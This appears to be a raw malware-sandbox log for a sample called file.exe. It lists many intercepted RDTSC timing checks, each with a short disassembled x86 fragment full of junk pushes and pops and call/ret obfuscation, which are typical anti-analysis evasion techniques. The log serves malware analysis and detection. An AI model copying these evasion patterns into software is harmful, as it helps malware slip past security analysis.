Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B25E2 second address: 8B25FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F81D4B5DC63h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88893F second address: 888945 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 888945 second address: 88894B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88894B second address: 88899C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F81D5048956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F81D5048958h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 sub dword ptr [ebp+122D2CE9h], ebx 0x0000002f mov dword ptr [ebp+122D3300h], edi 0x00000035 lea eax, dword ptr [ebp+1248A6C3h] 0x0000003b mov dword ptr [ebp+122D1944h], edi 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 ja 00007F81D5048956h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88899C second address: 8889A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8889A2 second address: 8889A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8889A7 second address: 8889BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007F81D4B5DC60h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8889BB second address: 868896 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 xor edx, dword ptr [ebp+122D28EAh] 0x0000000d call dword ptr [ebp+122D2BF6h] 0x00000013 pushad 0x00000014 pushad 0x00000015 jnp 00007F81D5048956h 0x0000001b jne 00007F81D5048956h 0x00000021 popad 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 888FA4 second address: 888FEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F81D4B5DC56h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push ebx 0x00000013 jmp 00007F81D4B5DC61h 0x00000018 pop ebx 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c push edi 0x0000001d pushad 0x0000001e popad 0x0000001f pop edi 0x00000020 jg 00007F81D4B5DC58h 0x00000026 popad 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b pushad 0x0000002c jng 00007F81D4B5DC58h 0x00000032 push edx 0x00000033 pop edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jnp 00007F81D4B5DC56h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 888FEE second address: 888FF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8890D6 second address: 8890E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F81D4B5DC56h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8898B5 second address: 8898B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 889C1D second address: 889C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jnc 00007F81D4B5DC62h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 889CDC second address: 869382 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D5048962h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+122D2916h] 0x00000013 lea eax, dword ptr [ebp+1248A707h] 0x00000019 mov edx, 78FF476Dh 0x0000001e push eax 0x0000001f jne 00007F81D5048964h 0x00000025 mov dword ptr [esp], eax 0x00000028 push 00000000h 0x0000002a push ecx 0x0000002b call 00007F81D5048958h 0x00000030 pop ecx 0x00000031 mov dword ptr [esp+04h], ecx 0x00000035 add dword ptr [esp+04h], 0000001Dh 0x0000003d inc ecx 0x0000003e push ecx 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 and cx, 8835h 0x00000047 lea eax, dword ptr [ebp+1248A6C3h] 0x0000004d add dword ptr [ebp+122D2EC4h], ecx 0x00000053 push eax 0x00000054 jbe 00007F81D504895Eh 0x0000005a push edx 0x0000005b jng 00007F81D5048956h 0x00000061 pop edx 0x00000062 mov dword ptr [esp], eax 0x00000065 adc edi, 753C1EB5h 0x0000006b call dword ptr [ebp+122D2BECh] 0x00000071 pushad 0x00000072 jmp 00007F81D5048968h 0x00000077 pushad 0x00000078 jmp 00007F81D5048964h 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83E554 second address: 83E564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnp 00007F81D4B5DC56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83E564 second address: 83E568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83E568 second address: 83E56C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B2C12 second address: 8B2C31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F81D5048956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F81D5048956h 0x00000014 jmp 00007F81D504895Bh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B2C31 second address: 8B2C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B2C35 second address: 8B2C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B2D7F second address: 8B2D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B2D85 second address: 8B2D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B2D8A second address: 8B2D95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F81D4B5DC56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B331D second address: 8B332E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F81D504895Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B6617 second address: 8B6624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B6624 second address: 8B6644 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D5048963h 0x00000007 je 00007F81D5048956h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8435E7 second address: 843606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F81D4B5DC68h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8BAB63 second address: 8BAB74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007F81D5048956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8BAB74 second address: 8BAB94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F81D4B5DC69h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8BAB94 second address: 8BAB98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8BADF5 second address: 8BADFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8BADFB second address: 8BAE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F81D5048964h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8BB7C6 second address: 8BB7DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D4B5DC5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8BB917 second address: 8BB91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8BB91D second address: 8BB93C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D4B5DC61h 0x00000007 jg 00007F81D4B5DC56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8BA878 second address: 8BA899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F81D5048967h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8BA899 second address: 8BA89D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8BA89D second address: 8BA8AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F81D504895Eh 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C0DB6 second address: 8C0DD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D4B5DC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F81D4B5DC5Bh 0x0000000e pop ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C0DD6 second address: 8C0DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C0DDA second address: 8C0DFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D4B5DC66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F81D4B5DC56h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C0774 second address: 8C0791 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F81D5048964h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C0791 second address: 8C07C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F81D4B5DC62h 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F81D4B5DC5Ah 0x00000012 jmp 00007F81D4B5DC60h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C1512 second address: 8C1532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F81D5048969h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C1532 second address: 8C1536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C1536 second address: 8C155B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F81D5048962h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007F81D504895Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C166D second address: 8C168E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F81D4B5DC68h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C168E second address: 8C1692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C1692 second address: 8C169C instructions: 0x00000000 rdtsc 0x00000002 je 00007F81D4B5DC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C169C second address: 8C16CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F81D5048956h 0x00000009 js 00007F81D5048956h 0x0000000f jmp 00007F81D5048960h 0x00000014 jl 00007F81D5048956h 0x0000001a popad 0x0000001b jne 00007F81D5048969h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C1815 second address: 8C1826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F81D4B5DC56h 0x0000000a jnc 00007F81D4B5DC56h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C1AC9 second address: 8C1ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C1ACD second address: 8C1AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C5B7D second address: 8C5B98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D5048961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C5B98 second address: 8C5B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C5B9E second address: 8C5BB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D504895Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C5BB1 second address: 8C5BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C7B75 second address: 8C7B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C7B7E second address: 8C7B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F81D4B5DC56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CA64E second address: 8CA655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CA655 second address: 8CA66A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F81D4B5DC60h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CA929 second address: 8CA99D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 jmp 00007F81D504895Fh 0x0000000d jmp 00007F81D5048969h 0x00000012 pop ebx 0x00000013 pushad 0x00000014 jmp 00007F81D5048963h 0x00000019 jmp 00007F81D5048963h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F81D5048967h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CA99D second address: 8CA9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CAB00 second address: 8CAB44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D5048963h 0x00000007 jmp 00007F81D5048963h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F81D5048963h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CAB44 second address: 8CAB4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CC746 second address: 8CC74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D245E second address: 8D2466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D2466 second address: 8D246D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D246D second address: 8D2487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F81D4B5DC5Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d ja 00007F81D4B5DC5Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D2487 second address: 8D24A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F81D5048962h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D24A7 second address: 8D24B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D4B5DC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D2644 second address: 8D264B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D27DA second address: 8D2817 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D4B5DC67h 0x00000007 jmp 00007F81D4B5DC68h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F81D4B5DC56h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88971F second address: 889723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 889723 second address: 889745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F81D4B5DC5Dh 0x0000000e push 00000004h 0x00000010 mov ecx, ebx 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 889745 second address: 88974A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D2D9A second address: 8D2D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D2D9E second address: 8D2DA4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D2DA4 second address: 8D2DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D2DAA second address: 8D2DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D2DB0 second address: 8D2DB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D2DB4 second address: 8D2DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F81D5048956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D2DC4 second address: 8D2DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D2DCA second address: 8D2DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D2F59 second address: 8D2F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F81D4B5DC56h 0x0000000a jmp 00007F81D4B5DC5Ch 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D2F75 second address: 8D2F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D3921 second address: 8D3925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D3925 second address: 8D3929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D3929 second address: 8D3932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D3932 second address: 8D3944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop esi 0x00000008 push edi 0x00000009 pushad 0x0000000a ja 00007F81D5048956h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
